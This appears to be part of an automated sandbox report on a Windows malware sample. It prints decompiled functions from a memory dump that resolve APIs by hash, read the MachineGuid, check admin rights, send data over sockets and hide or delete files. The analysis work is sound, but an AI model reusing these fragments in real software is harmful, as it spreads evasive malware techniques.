                                      • Opcode Fuzzy Hash: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
                                      • Instruction Fuzzy Hash: A5C048B10142087EAE016EE19C05CBB3F5EEA44228B008429BD18E9122EA3ADE2066A4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 92%
                                      			E00404A52(void* _a4, char* _a8, char* _a12) {
                                      				void* _v8;
                                      				int _v12;
                                      				void* __ebx;
                                      				char* _t10;
                                      				long _t13;
                                      				char* _t27;
                                      
                                      				_push(_t21);
                                      				_t27 = E00402B7C(0x208);
                                      				if(_t27 == 0) {
                                      					L4:
                                      					_t10 = 0;
                                      				} else {
                                      					E00402B4E(_t27, 0, 0x208);
                                      					_v12 = 0x208;
                                      					E004031E5(0, 9, 0xf4b4acdc, 0, 0);
                                      					_t13 = RegOpenKeyExA(_a4, _a8, 0, 0x20119,  &_v8); // executed
                                      					if(_t13 != 0) {
                                      						E00402BAB(_t27);
                                      						goto L4;
                                      					} else {
                                      						E004031E5(0, 9, 0xfe9f661a, 0, 0);
                                      						RegQueryValueExA(_v8, _a12, 0, 0, _t27,  &_v12); // executed
                                      						E00404A39(_v8); // executed
                                      						_t10 = _t27;
                                      					}
                                      				}
                                      				return _t10;
                                      			}









                                      APIs
                                        • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                                        • Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                                      • RegOpenKeyExA.KERNELBASE(00000032,?,00000000,00020119,00000000,00000009,F4B4ACDC,00000000,00000000,MachineGuid,00000032,00000000,00413DA5,00413987), ref: 00404A9A
                                      • RegQueryValueExA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000009,00000009,FE9F661A,00000000,00000000), ref: 00404ABC
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.460712813.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateOpenProcessQueryValue
                                      • String ID:
                                      • API String ID: 1425999871-0
                                      • Opcode ID: d488a9f9e3e4912de19e98427526cb377b3f09abeed86899b322f2e70aeae98a
                                      • Instruction ID: c751ae4fb1a51baa23b068920df28fa5e45e9ad9ad003da97b765f6d6e9ada80
                                      • Opcode Fuzzy Hash: d488a9f9e3e4912de19e98427526cb377b3f09abeed86899b322f2e70aeae98a
                                      • Instruction Fuzzy Hash: A301B1B264010C7EEB01AED69C86DBF7B2DDB81798B10003EF60475182EAB59E1156B9
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E00402BAB(void* _a4) {
                                      				void* _t3;
                                      				char _t5;
                                      
                                      				if(_a4 != 0) {
                                      					_t5 = RtlFreeHeap(GetProcessHeap(), 0, _a4); // executed
                                      					return _t5;
                                      				}
                                      				return _t3;
                                      			}





                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402BB9
                                      • RtlFreeHeap.NTDLL(00000000), ref: 00402BC0
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.460712813.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$FreeProcess
                                      • String ID:
                                      • API String ID: 3859560861-0
                                      • Opcode ID: 0ab6f2dbedfa6cb862415dde11aab857cc1d2c8de5bdcfad433bf240e63de12c
                                      • Instruction ID: 8dd5a347e09044be93d5ac0bfd75615970d35e99714971ab129ae27a0189db5c
                                      • Opcode Fuzzy Hash: 0ab6f2dbedfa6cb862415dde11aab857cc1d2c8de5bdcfad433bf240e63de12c
                                      • Instruction Fuzzy Hash: 7FC01235000A08EBCB001FD0E90CBE93F6CAB8838AF808020B60C480A0C6B49090CAA8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 40%
                                      			E004060BD(void* __eflags) {
                                      				signed int _v8;
                                      				char _v12;
                                      				short _v16;
                                      				char _v20;
                                      				void* __ebx;
                                      				intOrPtr* _t12;
                                      				signed int _t13;
                                      				intOrPtr* _t14;
                                      				signed int _t15;
                                      				void* _t24;
                                      
                                      				_v16 = 0x500;
                                      				_v20 = 0;
                                      				_t12 = E004031E5(0, 9, 0xf3a0c470, 0, 0);
                                      				_t13 =  *_t12( &_v20, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v12);
                                      				_v8 = _t13;
                                      				if(_t13 != 0) {
                                      					_t14 = E004031E5(0, 9, 0xe3b938df, 0, 0);
                                      					_t15 =  *_t14(0, _v12,  &_v8, _t24); // executed
                                      					asm("sbb eax, eax");
                                      					_v8 = _v8 &  ~_t15;
                                      					E0040604F(_v12);
                                      					return _v8;
                                      				}
                                      				return _t13;
                                      			}













                                      APIs
                                      • CheckTokenMembership.KERNELBASE(00000000,00000000,00000000,00000009,E3B938DF,00000000,00000000,00000001), ref: 00406115
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.460712813.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: CheckMembershipToken
                                      • String ID:
                                      • API String ID: 1351025785-0
                                      • Opcode ID: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
                                      • Instruction ID: 8b780b9e56efd5f2a9a2252a5f210822aeafba94d0ba5a8497d60ad8274f78a0
                                      • Opcode Fuzzy Hash: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
                                      • Instruction Fuzzy Hash: 7801867195020DBEEB00EBE59C86EFFB77CEF08208F100569B515B60C2EA75AF008764
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E00403C62(void* __ebx, void* __eflags, WCHAR* _a4) {
                                      				void* _t3;
                                      				int _t5;
                                      
                                      				_t3 = E00403D4D(__eflags, _a4); // executed
                                      				if(_t3 == 0) {
                                      					__eflags = 0;
                                      					E004031E5(__ebx, 0, 0xc8f0a74d, 0, 0);
                                      					_t5 = CreateDirectoryW(_a4, 0); // executed
                                      					return _t5;
                                      				} else {
                                      					return 1;
                                      				}
                                      			}





                                      APIs
                                      • CreateDirectoryW.KERNELBASE(00413D1F,00000000,00000000,C8F0A74D,00000000,00000000,00000000,?,00413D1F,00000000), ref: 00403C8B
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.460712813.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: CreateDirectory
                                      • String ID:
                                      • API String ID: 4241100979-0
                                      • Opcode ID: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
                                      • Instruction ID: 8def336d827aa123259dd30fe2d1f4df156212ecddfe904d71fbacf529eca846
                                      • Opcode Fuzzy Hash: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
                                      • Instruction Fuzzy Hash: 47D05E320450687A9A202AA7AC08CDB3E0DDE032FA7004036B81CE4052DB26861191E4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 37%
                                      			E0040642C(void* __eflags) {
                                      				short _v40;
                                      				intOrPtr* _t6;
                                      				void* _t10;
                                      
                                      				_t6 = E004031E5(_t10, 0, 0xe9af4586, 0, 0);
                                      				 *_t6( &_v40); // executed
                                      				return 0 | _v40 == 0x00000009;
                                      			}






                                      APIs
                                      • GetNativeSystemInfo.KERNELBASE(?,00000000,E9AF4586,00000000,00000000,?,?,?,?,004144CF,00000000,00000000,00000000,00000000), ref: 00406445
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.460712813.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: InfoNativeSystem
                                      • String ID:
                                      • API String ID: 1721193555-0
                                      • Opcode ID: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
                                      • Instruction ID: 89a273ea7bbabd9d74fc824e7d15e3b55fbc967ee531cdb223f62f0d5b23fb21
                                      • Opcode Fuzzy Hash: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
                                      • Instruction Fuzzy Hash: 60D0C9969142082A9B24FEB14E49CBB76EC9A48104B400AA8FC05E2180FD6ADF5482A5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 37%
                                      			E00404EEA(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                      				intOrPtr _t5;
                                      
                                      				_t5 = _a12;
                                      				if(_t5 == 0) {
                                      					_t5 = E00405D0B(_a8) + 1;
                                      				}
                                      				__imp__#19(_a4, _a8, _t5, 0); // executed
                                      				return _t5;
                                      			}




                                      APIs
                                      • send.WS2_32(00000000,00000000,00000000,00000000), ref: 00404F07
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.460712813.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: send
                                      • String ID:
                                      • API String ID: 2809346765-0
                                      • Opcode ID: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
                                      • Instruction ID: 973ad19c2726000f66dbac5dad6f1ecaf56acd36cc9bde1755ab86a88c27f217
                                      • Opcode Fuzzy Hash: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
                                      • Instruction Fuzzy Hash: F8D09231140209BBEF016E55EC05BAA3B69EF44B54F10C026BA18991A1DB31A9219A98
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E00403BD0(WCHAR* _a4, WCHAR* _a8, long _a12) {
                                      				int _t6;
                                      				void* _t7;
                                      
                                      				E004031E5(_t7, 0, 0xc9143177, 0, 0);
                                      				_t6 = MoveFileExW(_a4, _a8, _a12); // executed
                                      				return _t6;
                                      			}





                                      APIs
                                      • MoveFileExW.KERNELBASE(00000000,00412C16,?,00000000,C9143177,00000000,00000000,?,004040B6,00000000,00412C16,00000001,?,00412C16,00000000,00000000), ref: 00403BEB
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.460712813.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: FileMove
                                      • String ID:
                                      • API String ID: 3562171763-0
                                      • Opcode ID: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
                                      • Instruction ID: 27267517ebbd606c040c475238707358b0366275ca1c9c11413b547716cf2561
                                      • Opcode Fuzzy Hash: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
                                      • Instruction Fuzzy Hash: 5AC04C7500424C7FEF026EF19D05C7B3F5EEB49618F448825BD18D5421DA37DA216664
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • WSAStartup.WS2_32(00000202,?), ref: 00404E08
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.460712813.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: Startup
                                      • String ID:
                                      • API String ID: 724789610-0
                                      • Opcode ID: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
                                      • Instruction ID: edfb6e6a7b2c2d2c81179f298452045bbfcf768a57aceb16f5d93ae35c4528ea
                                      • Opcode Fuzzy Hash: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
                                      • Instruction Fuzzy Hash: 6EC08C32AA421C9FD750AAB8AD0FAF0B7ACD30AB02F0002B56E1DC60C1E550582906E2
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E0040427D(WCHAR* _a4) {
                                      				int _t4;
                                      				void* _t5;
                                      
                                      				E004031E5(_t5, 0, 0xcac5886e, 0, 0);
                                      				_t4 = SetFileAttributesW(_a4, 0x2006); // executed
                                      				return _t4;
                                      			}





                                      APIs
                                      • SetFileAttributesW.KERNELBASE(00000000,00002006,00000000,CAC5886E,00000000,00000000,?,00412C3B,00000000,00000000,?), ref: 00404297
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.460712813.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: AttributesFile
                                      • String ID:
                                      • API String ID: 3188754299-0
                                      • Opcode ID: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
                                      • Instruction ID: e837d3b0865cda380a04769d40cc561620ee701a25bf2a33446201ee5459e2a9
                                      • Opcode Fuzzy Hash: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
                                      • Instruction Fuzzy Hash: A9C092B054430C3EFA102EF29D4AD3B3A8EEB41648B008435BE08E9096E977DE2061A8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E00404A19(void* _a4, short* _a8, void** _a12) {
                                      				long _t5;
                                      				void* _t6;
                                      
                                      				E004031E5(_t6, 9, 0xdb552da5, 0, 0);
                                      				_t5 = RegOpenKeyW(_a4, _a8, _a12); // executed
                                      				return _t5;
                                      			}





                                      APIs
                                      • RegOpenKeyW.ADVAPI32(?,?,?,00000009,DB552DA5,00000000,00000000), ref: 00404A35
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.460712813.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: Open
                                      • String ID:
                                      • API String ID: 71445658-0
                                      • Opcode ID: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
                                      • Instruction ID: b1d3f25f69c2166d3d07fcddbc0993e3b6974a4a806b5379996ceb22213e89af
                                      • Opcode Fuzzy Hash: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
                                      • Instruction Fuzzy Hash: 5BC012311802087FFF012EC1CC02F483E1AAB08B55F044011BA18280E1EAB3A2205658
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E00403C40(void* _a4) {
                                      				int _t4;
                                      				void* _t5;
                                      
                                      				E004031E5(_t5, 0, 0xfbce7a42, 0, 0);
                                      				_t4 = FindCloseChangeNotification(_a4); // executed
                                      				return _t4;
                                      			}





                                      APIs
                                      • FindCloseChangeNotification.KERNELBASE(00000000,00000000,FBCE7A42,00000000,00000000,?,00404344,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00403C55
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.460712813.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: ChangeCloseFindNotification
                                      • String ID:
                                      • API String ID: 2591292051-0
                                      • Opcode ID: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
                                      • Instruction ID: f60e35b61e15034c3e7e350ceef27d37971f1a6745175d5827dd76012fe363c0
                                      • Opcode Fuzzy Hash: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
                                      • Instruction Fuzzy Hash: 70B092B01182087EAE006AF29C05C3B3E4ECA4060874094267C08E5451F937DF2014B4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E00403C08(WCHAR* _a4) {
                                      				int _t4;
                                      				void* _t5;
                                      
                                      				E004031E5(_t5, 0, 0xdeaa357b, 0, 0);
                                      				_t4 = DeleteFileW(_a4); // executed
                                      				return _t4;
                                      			}





                                      APIs
                                      • DeleteFileW.KERNELBASE(?,00000000,DEAA357B,00000000,00000000), ref: 00403C1D
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.460712813.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: DeleteFile
                                      • String ID:
                                      • API String ID: 4033686569-0
                                      • Opcode ID: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
                                      • Instruction ID: 5639c68ad781144a2d68ff400f656d3d2c658e81fc8059c2e96e04b5885f7932
                                      • Opcode Fuzzy Hash: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
                                      • Instruction Fuzzy Hash: EDB092B04082093EAA013EF59C05C3B3E4DDA4010870048257D08E6111EA36DF1010A8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E00402C1F(WCHAR* _a4) {
                                      				struct HINSTANCE__* _t4;
                                      				void* _t5;
                                      
                                      				E004031E5(_t5, 0, 0xe811e8d4, 0, 0);
                                      				_t4 = LoadLibraryW(_a4); // executed
                                      				return _t4;
                                      			}





                                      APIs
                                      • LoadLibraryW.KERNELBASE(?,00000000,E811E8D4,00000000,00000000), ref: 00402C34
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.460712813.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: LibraryLoad
                                      • String ID:
                                      • API String ID: 1029625771-0
                                      • Opcode ID: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
                                      • Instruction ID: cd53f9395925d29cf68d66af6aae64644fca58afce9bbcd5edfe8b9605b00cd0
                                      • Opcode Fuzzy Hash: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
                                      • Instruction Fuzzy Hash: C9B092B00082083EAA002EF59C05C7F3A4DDA4410874044397C08E5411F937DE1012A5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E00403BEF(void* _a4) {
                                      				int _t4;
                                      				void* _t5;
                                      
                                      				E004031E5(_t5, 0, 0xda6ae59a, 0, 0);
                                      				_t4 = FindClose(_a4); // executed
                                      				return _t4;
                                      			}





                                      0x00403bfc
                                      0x00403c04
                                      0x00403c07

                                      APIs
                                      • FindClose.KERNELBASE(00403F8D,00000000,DA6AE59A,00000000,00000000,?,00403F8D,00000000), ref: 00403C04
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.460712813.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: CloseFind
                                      • String ID:
                                      • API String ID: 1863332320-0
                                      • Opcode ID: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
                                      • Instruction ID: 1ebc74916e7009c76bd4f38d62a0f1d2d6d24e136e2668fcc01a71b48f24aa02
                                      • Opcode Fuzzy Hash: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
                                      • Instruction Fuzzy Hash: FDB092B00442087EEE002EF1AC05C7B3F4EDA4410970044257E0CE5012E937DF1010B4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E00403BB7(WCHAR* _a4) {
                                      				long _t4;
                                      				void* _t5;
                                      
                                      				E004031E5(_t5, 0, 0xc6808176, 0, 0);
                                      				_t4 = GetFileAttributesW(_a4); // executed
                                      				return _t4;
                                      			}





                                      0x00403bc4
                                      0x00403bcc
                                      0x00403bcf

                                      APIs
                                      • GetFileAttributesW.KERNELBASE(00413D1F,00000000,C6808176,00000000,00000000,?,00403D58,00413D1F,?,00403C6D,00413D1F,?,00413D1F,00000000), ref: 00403BCC
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.460712813.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: AttributesFile
                                      • String ID:
                                      • API String ID: 3188754299-0
                                      • Opcode ID: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
                                      • Instruction ID: 12c622a32f4ce0ce5baf48af10e49973588d22e73ecb696d4958cc4f11b8a016
                                      • Opcode Fuzzy Hash: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
                                      • Instruction Fuzzy Hash: D2B092B05042083EAE012EF19C05C7B3A6DCA40148B4088297C18E5111ED36DE5050A4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E004049FF(void* _a4) {
                                      				long _t3;
                                      				void* _t4;
                                      
                                      				E004031E5(_t4, 9, 0xd980e875, 0, 0);
                                      				_t3 = RegCloseKey(_a4); // executed
                                      				return _t3;
                                      			}





                                      0x00404a0d
                                      0x00404a15
                                      0x00404a18

                                      APIs
                                      • RegCloseKey.KERNELBASE(00000000,00000009,D980E875,00000000,00000000,?,00404A44,?,?,00404AC6,?), ref: 00404A15
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.460712813.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: Close
                                      • String ID:
                                      • API String ID: 3535843008-0
                                      • Opcode ID: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
                                      • Instruction ID: 75bcc15c4d71fff8019d16f1d9debb39272117f3de5fdcc107556e34aff8dcac
                                      • Opcode Fuzzy Hash: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
                                      • Instruction Fuzzy Hash: 7CC092312843087AEA102AE2EC0BF093E0D9B41F98F500025B61C3C1D2E9E3E6100099
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E00403B64(WCHAR* _a4) {
                                      				int _t3;
                                      				void* _t4;
                                      
                                      				E004031E5(_t4, 2, 0xdc0853e1, 0, 0);
                                      				_t3 = PathFileExistsW(_a4); // executed
                                      				return _t3;
                                      			}





                                      0x00403b72
                                      0x00403b7a
                                      0x00403b7d

                                      APIs
                                      • PathFileExistsW.KERNELBASE(?,00000002,DC0853E1,00000000,00000000), ref: 00403B7A
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.460712813.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: ExistsFilePath
                                      • String ID:
                                      • API String ID: 1174141254-0
                                      • Opcode ID: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
                                      • Instruction ID: 8bd75bc93bbce64143a6918826fd0663652f5dbe7ab318808702af7ec0dd126f
                                      • Opcode Fuzzy Hash: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
                                      • Instruction Fuzzy Hash: F4C0923028830C3BF9113AD2DC47F197E8D8B41B99F104025B70C3C4D2D9E3A6100199
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • closesocket.WS2_32(00404EB0), ref: 00404DEB
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.460712813.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: closesocket
                                      • String ID:
                                      • API String ID: 2781271927-0
                                      • Opcode ID: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
                                      • Instruction ID: a7719220e23c04317d26723f710bfa070304820e6d91f105ed764937a1a9d613
                                      • Opcode Fuzzy Hash: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
                                      • Instruction Fuzzy Hash: F4A0113000020CEBCB002B82EE088C83F2CEA882A0B808020F80C00020CB22A8208AC8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E00403F9E(void* _a4) {
                                      				int _t3;
                                      				void* _t4;
                                      
                                      				E004031E5(_t4, 0, 0xf53ecacb, 0, 0);
                                      				_t3 = VirtualFree(_a4, 0, 0x8000); // executed
                                      				return _t3;
                                      			}





                                      0x00403fac
                                      0x00403fba
                                      0x00403fbe

                                      APIs
                                      • VirtualFree.KERNELBASE(0041028C,00000000,00008000,00000000,F53ECACB,00000000,00000000,00000000,?,0041028C,00000000), ref: 00403FBA
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.460712813.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: FreeVirtual
                                      • String ID:
                                      • API String ID: 1263568516-0
                                      • Opcode ID: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
                                      • Instruction ID: 31a36aa897feec3f2575a3818ba469950b8b51fe97d839facc05156de448dee4
                                      • Opcode Fuzzy Hash: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
                                      • Instruction Fuzzy Hash: 9CC08C3200613C32893069DBAC0AFCB7E0CDF036F4B104021F50C6404049235A0186F8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E00406472(long _a4) {
                                      				void* _t3;
                                      				void* _t4;
                                      
                                      				_t3 = E004031E5(_t4, 0, 0xcfa329ad, 0, 0);
                                      				Sleep(_a4); // executed
                                      				return _t3;
                                      			}





                                      0x0040647f
                                      0x00406487
                                      0x0040648a

                                      APIs
                                      • Sleep.KERNELBASE(?,00000000,CFA329AD,00000000,00000000), ref: 00406487
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.460712813.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: Sleep
                                      • String ID:
                                      • API String ID: 3472027048-0
                                      • Opcode ID: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
                                      • Instruction ID: 8d08050a97d9600d7c0dbf2a5018eca7d85037e123ae0040efa9f3f0a7dd9c36
                                      • Opcode Fuzzy Hash: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
                                      • Instruction Fuzzy Hash: FBB092B08082083EEA002AF1AD05C3B7A8DDA4020870088257C08E5011E93ADE1150B9
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E004058EA(char* _a4, char* _a8) {
                                      				char* _t4;
                                      				void* _t5;
                                      
                                      				E004031E5(_t5, 2, 0xc5c16604, 0, 0);
                                      				_t4 = StrStrA(_a4, _a8); // executed
                                      				return _t4;
                                      			}





                                      0x004058f8
                                      0x00405903
                                      0x00405906

                                      APIs
                                      • StrStrA.KERNELBASE(?,?,00000002,C5C16604,00000000,00000000), ref: 00405903
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.460712813.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 042642b6324743061f7cb6dcc4248db4a99ff7c1e794a59b5538058313c095a3
                                      • Instruction ID: d5512459148ba4630ff55d530b0b04b7b8071b1588054f6e556ec5c474e97d6d
                                      • Opcode Fuzzy Hash: 042642b6324743061f7cb6dcc4248db4a99ff7c1e794a59b5538058313c095a3
                                      • Instruction Fuzzy Hash: 82C04C3118520876EA112AD19C07F597E1D9B45B68F108425BA1C6C4D19AB3A6505559
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E00405924(WCHAR* _a4, WCHAR* _a8) {
                                      				WCHAR* _t4;
                                      				void* _t5;
                                      
                                      				E004031E5(_t5, 2, 0xd6865bd4, 0, 0);
                                      				_t4 = StrStrW(_a4, _a8); // executed
                                      				return _t4;
                                      			}





                                      0x00405932
                                      0x0040593d
                                      0x00405940

                                      APIs
                                      • StrStrW.KERNELBASE(?,?,00000002,D6865BD4,00000000,00000000), ref: 0040593D
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.460712813.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 4bee70add85649cbd4a2768cfe9b9dcd091b7df8922090f97a094487be0f2036
                                      • Instruction ID: 5151f40d070928696ad3a3dfeafe9e6e8178c5ee17630b0dfe73cc98556a196c
                                      • Opcode Fuzzy Hash: 4bee70add85649cbd4a2768cfe9b9dcd091b7df8922090f97a094487be0f2036
                                      • Instruction Fuzzy Hash: 8FC04C311842087AEA112FD2DC07F587E1D9B45B58F104015B61C2C5D1DAB3A6105659
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Non-executed Functions

                                      APIs
                                      • CoInitialize.OLE32(00000000), ref: 0040438F
                                      • CoCreateInstance.OLE32(00418EC0,00000000,00000001,00418EB0,?), ref: 004043A9
                                      • VariantInit.OLEAUT32(?), ref: 004043C4
                                      • SysAllocString.OLEAUT32(?), ref: 004043CD
                                      • VariantInit.OLEAUT32(?), ref: 00404414
                                      • SysAllocString.OLEAUT32(?), ref: 00404419
                                      • VariantInit.OLEAUT32(?), ref: 00404431
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.460712813.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: InitVariant$AllocString$CreateInitializeInstance
                                      • String ID:
                                      • API String ID: 1312198159-0
                                      • Opcode ID: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
